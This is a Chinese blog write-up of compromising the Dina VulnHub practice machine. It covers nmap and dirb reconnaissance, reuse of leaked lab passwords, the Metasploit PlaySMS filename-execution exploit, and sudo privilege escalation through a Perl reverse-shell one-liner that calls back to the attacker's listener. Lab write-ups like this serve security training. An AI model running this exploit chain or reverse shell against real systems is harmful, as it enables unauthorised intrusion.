靶机2.Dina

已于 2023-11-10 15:35:31 修改
阅读量152 收藏 2
点赞数
分类专栏: 靶机 文章标签: scala 开发语言 后端
于 2023-10-05 11:50:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/133552038
版权

1、信息收集

nmap -sS 10.9.47.0/24 -T4

nmap -sV -p- 10.9.47.217 -T4

进入网站

没有发现可用信息

2、目录扫描

dirb http://10.9.47.217/

http://10.10.10.129/robots.txthttp://10.9.47.217/robots.txt

http://10.9.47.217/nothing/

发现密码

#my secret pass
freedom
password
helloworld!
diana
iloveroot

http://10.9.47.217/secure/

发现压缩包(下载解压)

发现需要密码

使用上面密码进行尝试

freedom
解压之后得到名为backup-cred.mp3 的文件,并且无法使用播放器打开

查看mp3 文件的类型

发现是纯文本类型

右击用记事本打开

uname: touhid
password: ******
url : /SecreTSMSgatwayLogin

可能是个目录

  • 尝试登陆
touhid:diana

进来了

发现是playSMS

3.直接msfconsole

msfconsole
搜索模块
msf6 > search playsms
渗透攻击
msf6 > use exploit/multi/http/playsms_filename_exec
msf6 exploit(multi/http/playsms_filename_exec) > set RHOSTS 10.9.47.217
msf6 exploit(multi/http/playsms_filename_exec) > set LHOST 10.9.47.222
msf6 exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin/
msf6 exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
msf6 exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
msf6 exploit(multi/http/playsms_filename_exec) > exploit
meterpreter > shell

4 sudo提权

sudo -l

5 反弹shell

nc -lnvp 1234(卡里开启监听)
sudo perl -e 'use Socket;$i="10.9.47.222";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

成功

wj33333
关注
专栏目录
靶机实战-Dina 1.0
滕财然的博客
01-28 1333
Dina 1.0靶机实战 文章目录Dina 1.0靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务5、提权提权方式二 1、主机发现 目标IP:192.168.232.157 2、端口扫描 3、端口详细信息扫描 只开放80端口 4、访问80端口–http服务 主页啥都没有,直接dirb扫一下目录 依次访问目录: index就是主页,就不看了 发现robo...
靶机测试--Dina
ximo的博客
03-28 377
目录信息收集主机发现端口扫描目录扫描漏洞发掘提权总结 信息收集 主机发现 端口扫描 只有80端口: 目录扫描 访问每一个可以访问的路径: 主页: nothing/pass: secure/: 漏洞发掘 得到了一个类似密码字典,一个zip文件。 下载zip文件: 需要密码,使用获得的密码freedom,解压后为mp3格式,但是无法播放: 使用文本打开: 获得了用户名和一个后台,打开: 使用diana可以成功登录: 网站框架为playsms。 搜索CMS漏洞: 有三个属于msf,使用msf
靶机【B2R】Dina-1-0-1
干铮的博客
09-27 482
【B2R】Dina-1-0-1 1.信息收集 根据靶机MAC地址获取IP。 Nmap -sP 192.168.43.0/24 Nmap 192.168.43.91 -A -p- -oN nmap.A 2.网页信息收集 访问站点 御剑扫描敏感目录 敏感目录 http://192.168.43.91/nothing/ 后台备份文件 解压文件尝试使用之前留给的密码 freedom 使用文本打开文件 访问http://192.168.43.
【VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 1077
靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
Dina靶机渗透
weixin_44769042的博客
10-10 665
挺有意思的一个靶机 目录 主机发现 端口扫描 目录扫描 去web端看看,开始渗透 反弹shell 方法1 方法2 提权 尝试1-失败 尝试2-脏牛提权-成功 主机发现 netdiscover -i eth0 -r 192.168.129.0/24 端口扫描 扫描端口的服务版本,服务器操作系统,中间件等信息 目录扫描 去web端看看,开始渗透 看了看页面也没啥有用信息 一个提交信息 只是爆出服务器中间件版本然后也不能操作什么 还有一个链.
靶机渗透测试(Dina: 1.0.1)
@小张小张的博客
12-07 1646
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(====) 描述:It wated for kTheBox flag进度:2/2 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 靶机ip为: 192.168.10.133 2. nmap进行靶机端口服务扫描 命令:
Dina: 1.0.1靶机
m0_61995767的博客
08-05 438
Dina: 1.0.1打靶记录
【vulnhub】Dina靶机
wbplife的博客
08-01 314
继续拼接文件里面的目录,没有什么可用的信息,只有在nothing目录里有404 NOT FOUND。是一个登录框,那肯定用户名是touhid ,密码用上面保存的那几个尝试一下,发现diana可以成功。下载这个文件,发现需要密码,用刚才发现的密码尝试,有一个正确的freedom。是一个MP3文件,正常打不开,使用记事本打开,可以找到有url和用户名。可以从图片上看到一个新的账户名,密码是自己设置的,进行跳转。进行源码检查,发现存在可能像密码的记录,进行保存。IP网址访问,点击之后没有什么可利用的信息。
靶机记录(一):Dina
weixin_47306547的博客
10-29 352
目录 主机发现 端口扫描 Web渗透 目录扫描 信息利用 GetShell 提权 清痕迹,留后门 主机发现 端口扫描 Web渗透 目录扫描 信息利用 GetShell 提权 清痕迹,留后门
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
CTF6靶机实战.zip
05-25
2. 文件上传漏洞:学习如何发现和利用文件上传漏洞,以及如何构造反弹shell。 3. Linux脚本和系统漏洞利用:深入理解系统漏洞,编写和执行利用脚本。 4. Metasploit Framework:掌握基本的Metasploit操作,如模块...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Chisel简明教程
最新发布
飞鹤的程序员人生
09-13 623
Chisel(Scala嵌入式硬件构造语言)是一种嵌入在高级编程语言Scala中的硬件构造语言。Chisel是一个特殊类定义、预定义对象和Scala内部使用约定的库,因此当你编写Chisel代码时,实际上是在编写一个构建硬件图的Scala程序。随着经验的积累并希望使代码更简洁或更可重用,利用Scala语言的潜在强大功能变得很重要。它是由加州大学伯克利分校的 ADEPT 实验室开发的。Chisel结合敏捷开发,非常适合编写RTL。
测试-Gatling 与性能测试
Flying_Fish_roe的博客
09-12 384
性能测试是一种软件测试类型,旨在评估系统在负载下的响应时间、吞吐量和资源利用率等性能指标。通过性能测试,开发者和运维团队能够识别出系统的瓶颈、优化系统性能,并确保其在实际生产环境中能够处理预期的流量。负载测试:通过模拟多个用户同时访问系统,测试系统在高负载下的行为和响应能力。压力测试:将系统负载逐步增加,直至系统崩溃,评估其最大承受能力。容量测试:确定系统在特定硬件资源条件下的最大用户处理量。稳定性测试:在较长时间内保持负载,检查系统的稳定性和是否存在内存泄漏等问题。Gatling。
【java】scala ExecutorService停止线程池的简单案例
lisacumt的专栏
09-13 116
scala ExecutorService停止线程池的简单案例
flink程序 官方测试工具 scala版本 本地亲测
yy的博客
09-10 157
udf测试 flinkc程序测试。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值